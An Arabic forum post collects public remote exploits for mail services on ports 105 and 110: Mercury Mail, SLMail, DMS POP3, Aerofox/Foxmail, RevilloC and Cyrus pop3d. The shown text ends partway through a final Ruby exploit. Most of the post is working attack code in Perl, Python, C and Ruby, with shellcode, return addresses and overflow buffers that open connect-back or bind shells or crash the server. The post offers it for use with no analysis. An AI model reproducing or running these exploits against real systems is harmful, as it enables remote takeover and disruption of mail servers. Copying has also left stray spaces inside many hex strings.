اخلاقي تاج راسي
10-08-2013, 04:04 AM
بسم الله الرحمن الرحيم
السلام عليكم و رحمة الله و بركاته
ان شاء الله تكونو في افضل حال
أضع بين يديكم البورتات و ثغراتها
بورت 105 و 110 و 111 و 113
نبدأ بـ بورت 105
105 Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)
### mercury***ywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
################################################## #################
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x 49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x 59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x 96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x 2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x 92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\x AA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\x B7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\x A8\xD7\x9B\x69"
."\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x 9E\xE6\x8A\x4B"
."\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x 92\x93\x93\x93"
."\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x 0E\xA8\x3D\x3D"
."\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x 94\x49\x87\xFE"
."\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\x F1\x0B\x8B\x83"
."\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x 03\x09\xCF\xC1"
."\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\x C1\x1F\xA4\x49"
."\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x 69\x9C\x9B\x01"
."\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\x D4\x6F\x1B\xC7"
."\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x 6F\x2E\x3B\x68"
."\xA2\x25\xBB\x04\xBB";
$numtargets = 1;
@targets =
(
["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "\x83\xf2\x41\x00"]
);
print "Okayokay THiS iS 0DAY!!!\n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT\nkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!\n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!\n";
if ($#ARGV ne 3) {
print "usage: mecury***ywarez.pl target targettype yourip yourport\n\n";
for ($i=0; $i<$numtargets; $i++) {
print " [".$i."]...". $targets[$i][0]. "\n";
}
exit(0);
}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '105',
Proto => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);
($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);
$pad="A" x 408 . $cbsc . "\x90\x90\xeb\x04";
$pad2="A" x 440;
$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPP\xe9\x87\xfe\xff\xff".$pad2;
print $sock "$x\r\n";
while (<$sock>) {
print;
}
# [2005-12-16]
انتهينا من بورت 105
نبداء بـ بورت 110
110 SLMail 5.5 POP3 PASS Buffer Overflow Exploit
################################################## #######
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the PASS command #
# #
################################################## #######
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
################################################## #######
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
################################################## #######
import struct
import socket
print "\n\n############################################## #"
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!"
print "\n\n############################################## #"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
try:
print "\nSending evil buffer..."
s.connect(('192.168.1.167',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 4444 on victim machine."
except:
print "Could not connect to POP3!"
# [2004-11-18]
110 DMS POP3 Server (1.5.3 build 37) Buffer Overflow Exploit
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
################################################## ###
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
sleep(1);
print $socket "USER " . "A" x 1023;
close $socket;
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
close $socket;
print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
# [2004-11-21]
110 Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
#define PORT_OFFSET 118
#define IP_OFFSET 111
char Shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x 12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x 02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\x CD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x 75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\x C9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\x F1\x9B\x99\x99"
"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\x EC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\x F3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\x C5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\x C9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x 55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\x CF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\x AA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x 58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x 9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x 32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x 8F\x34\x40\x9C"
"\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x 34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
char szUser[] = "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz12 34567890a"
"bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno pqrstuvwxyz123"
"4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg hijkklmnopqrst"
"uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567 890abcdAAAAijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxy z1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopq rstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghi jklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890a bcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123 4567890abcdefg"
"hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstu vwxyz123456789"
"0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklm nopqrstuvwxyz1"
"234567890abcdefghijklmnopqrstuvwxyz1234567890abcde fghijklmnopqrs"
"tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567 890abcdefghijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxy z1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopq rstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghi jklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890a bcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123 4567890abcdefg"
"hijklmnopqrstuvwxyz\r\n";
unsigned char szPass[] = "pass siglos\r\n";
void help(char *program)
{
printf ("================================================== ======\r\n");
printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflow\r\n");
printf ("================================================== ======\r\n\r\n");
printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
printf ("e.g.:\r\n");
printf (" %s 127.0.0.1 202.119.9.42 8111\r\n", program);
printf ("\r\n The ret address is 0x7ffa1571.\r\n");
exit(0);
}
SOCKET Connect(char *u_host ,unsigned short u_port)
{
WSADATA wsaData;
SOCKET sock;
struct hostent *r;
struct sockaddr_in r_addr;
int timeout = 1000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return -1;
}
if((r=gethostbyname(u_host))== NULL)
{
return -1 ;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= = INVALID_SOCKET)
{
return -1 ;
}
r_addr.sin_family=AF_INET;
r_addr.sin_port=htons(u_port);
r_addr.sin_addr=*((struct in_addr*)r->h_addr);
if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
{
printf("Can't connect\n");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
return(sock);
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void tr(SOCKET s)
{
char buff[1500];
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf("%s\r\n",buff);
}
void SlowSend(SOCKET s, char *buf, int p)
{
//send(s, buf, sizeof(buf),0);
//send(s, "\r\n", 2,0);
for(unsigned int i = 0; i < strlen(buf); i++)
{
Sleep(p);
printf("%c", buf[i]);
send(s, (char*)&(buf[i]), 1, 0);
}
}
void main(int argc, char *argv[])
{
/*_asm{
mov eax,90909091h
dec eax
a: dec ebx
cmp [ebx], eax
jnz a
push ebx
ret
}*/
if(argc != 4)
help(argv[0]);
unsigned short port;
unsigned long ip;
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[2])^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);
SOCKET s = Connect(argv[1], 110);
tr(s);
memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
memcpy(szUser + 244 + 8, "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\x C3\x90\x90\x90\x90", 17);
memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
SlowSend(s, (char*)szUser, 1);
getch();
tr(s);
SlowSend(s, (char*)szPass, 100);
tr(s);
Disconnect(s);
return;
}
// [2005-03-02]
110 RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC
#!/usr/bin/perl -w
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
#The mail server is a central point for emails coming in and going out from home or office
#The service will work with any standard email client that supports POP3 and SMTP.
#by sending a large buffer after USER commands
#C:\>nc 127.0.0.1 110
#+OK RevilloC POP3 Ready
#USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#ntdll!wcsncat+0x387:
#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX pointe to "\xdd"x4
#ECX dddddddd
#EAX FFFFFFFF
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for eductional, testing and demonstrating purpose only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33".
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C".
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE".
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB".
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77".
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77".
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77".
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77".
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77".
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77".
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77".
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77".
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77".
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB".
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C".
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0".
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77".
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0".
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB".
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5".
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98".
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE".
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77".
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8".
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF".
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90".
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74".
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4".
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94".
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5".
"\xD3\x4A\x8C\x88";
$buffer = "\x90"x3601;
$eax ="\x83\xb5\x19\x01"; # change if needed
$peb= "\x20\xf0\xfd\x7f"; #PEB lock
$user ="USER ";
$enter = "\x0d\x0a";
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"110"); unless ($connect) { die "cant connect" }
print "\nRevilloC mail server remote PoC exploit by securma massine\n";
print "\nsecurma\@morx.org\n";
print "\n+++++++++++www.morx.org++++++++++++++++\n";
$connect->recv($text,128);
print "$text\n";
print "[+] Sent USER\n";
$connect->send($user . $buffer . $shellcode . $eax . $peb . $enter);
print "[+] Sent shellcode..telnet to victim host port 9191\n";
# [2006-03-07]
110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
/* zeroday warez
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*********************************************
* cyruspop3d.c - cyrus pop3d remote exploit by kcope
* tested on cyrus-imapd-2.3.2,linux
*
* bug found 23 Apr 2006 by kcope
*--------------------------------------------
*
* imapd/pop3d.c line 1830 :
* char userbuf[MAX_MAILBOX_NAME+1], *p;
* ...
* if (!ulen) ulen = strlen(user);
* if (config_getswitch(IMAPOPT_POPSUBFOLDERS)) {
* memcpy(userbuf, user, ulen);
* userbuf[ulen] = '\0';
* ...
* popsubfolders has to be enabled
*
* thnx to blackzero revoguard wY! qobaiashi bogus alex
* Love to Lisa :-)
*********************************************
* !!! PRIVATE - DONT DISTRIBUTE - PRIVATE !!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>
#include <unistd.h>
#include <netdb.h>
#include <errno.h>
#define POP3PORT 110
#define BINDPORT 13370
unsigned char shellcode[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
int do_connect (char *remotehost, int port)
{
static struct hostent *host;
static struct sockaddr_in addr;
static int done=0;
int s;
if (!inet_aton(remotehost, &addr.sin_addr) && (done != 1))
{
host = gethostbyname(remotehost);
if (!host)
{
perror("gethostbyname() failed");
return -1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
s = socket(PF_INET, SOCK_STREAM, 0);
if (s == -1)
{
close(s);
perror("socket() failed");
return -1;
}
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
{
close(s);
if (port == POP3PORT) perror("connect() failed");
return -1;
}
done=1;
return s;
}
void do_exploit(int sock, unsigned int returnaddr)
{
char nops[360];
char nops2[100];
char exploitbuffer[1024];
char recvbuf[30];
memset(&nops[0], '\0', sizeof(nops));
memset(&nops[0], 'A', 352);
memset(&nops2[0], '\0', sizeof(nops2));
memset(&nops2[0], 'A', 90);
while (1) {
recv(sock, recvbuf, 1, 0);
if ((recvbuf[0] == '\r') || (recvbuf[0] == '\n')) break;
}
sprintf(exploitbuffer, "USER %s%s%s\r\n", nops, shellcode, nops2);
exploitbuffer[strlen(exploitbuffer)-1] = (returnaddr >> 24) & 0xff;
exploitbuffer[strlen(exploitbuffer)-2] = (returnaddr >> 16) & 0xff;
exploitbuffer[strlen(exploitbuffer)-3] = (returnaddr >> 8) & 0xff;
exploitbuffer[strlen(exploitbuffer)-4] = (returnaddr) & 0xff;
send(sock, exploitbuffer, strlen(exploitbuffer), 0);
recv(sock, recvbuf, sizeof(recvbuf)-1, 0);
}
int do_checkvulnerable(int sock) {
char checkbuffer[1024];
char recvbuffer[10];
memset(&checkbuffer[0], '\0', sizeof(checkbuffer)-1);
memset(&checkbuffer[0], 'A', sizeof(checkbuffer)-2);
checkbuffer[0]='U';
checkbuffer[1]='S';
checkbuffer[2]='E';
checkbuffer[3]='R';
checkbuffer[4]=' ';
checkbuffer[sizeof(checkbuffer)-3]='\r';
checkbuffer[sizeof(checkbuffer)-2]='\n';
while (1) {
recv(sock, recvbuffer, 1, 0);
if ((recvbuffer[0] == '\r') || (recvbuffer[0] == '\n')) break;
}
send(sock, checkbuffer, strlen(checkbuffer), 0);
if (recv(sock, recvbuffer, sizeof(recvbuffer)-1, MSG_WAITALL) < 3)
return 0;
return -1;
}
int do_remote_shell(int sockfd)
{
while(1)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sockfd,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))
{
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds))
{
if((cnt=read(0,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(sockfd,buf,cnt);
}
if(FD_ISSET(sockfd,&fds))
{
if((cnt=read(sockfd,buf,1024))<1)
{
if(errno==EWOULDBLOCK||errno==EAGAIN)
continue;
else
break;
}
write(1,buf,cnt);
}
}
}
}
int main(int argc, char **argv)
{
char remotehost[255];
int s,s2,i;
unsigned int returnaddr;
printf("cyrus pop3d remote exploit [kcope/2006]\n");
if (argc < 3) {
printf("usage: %s <remote host> <brute force start return address>\n", argv[0]);
printf("eg: %s localhost bfffa000\n", argv[0]);
return 1;
}
strcpy(remotehost, argv[1]); //uhoho
if (sscanf(argv[2], "%8x", &returnaddr) == 0) {
printf("Specify valid start return address\n");
return 1;
}
printf("Checking if vulnerable... ");
s=do_connect(remotehost, POP3PORT);
if (do_checkvulnerable(s) == -1) {
close(s);
printf("\ncyrus pop3d seems not to be vulnerable\nno popsubfolders defined at remote host?\n");
return 1;
}
close(s);
printf("SUCCESS!\n");
while (returnaddr < 0xbfffffff) {
returnaddr+=16;
printf("CRACKADDR = %4x\n", returnaddr);
fflush(stdout);
s=do_connect(remotehost, POP3PORT);
if (s==-1)
return 1;
do_exploit(s, returnaddr);
for (i=0;i<2;i++) {
if ((s2=do_connect(remotehost, BINDPORT)) != -1) {
printf("\nALEX,ALEX WE GOT IT!!!\n");
do_remote_shell(s2);
return 0;
}
close(s2);
}
close(s);
}
return 0;
}
// [2006-05-21]
110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
#!/usr/bin/ruby
#
# cyrus-imapd pop3d exploit
# by bannedit
#
# 05/23/2006
# This exploit takes advantage of a stack based overflow.
# Once the stack corruption has occured it is possible
# to overwrite a pointer which is later used for a memcpy
# this gives us a write anything anywhere condition similar
# to a format string vulnerability.
#
# I choose to overwrite the GOT table with my shellcode and
# return to it. This defeats the VA random patch and possibly
# other stack protection features.
#
# tested on gentoo-sources linux 2.6.16
require 'socket'
#will add targets for other linux distros
targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' }
#metasploit bind shellcode by skape 84 bytes port 4444#
shellcode =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96"+
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56"+
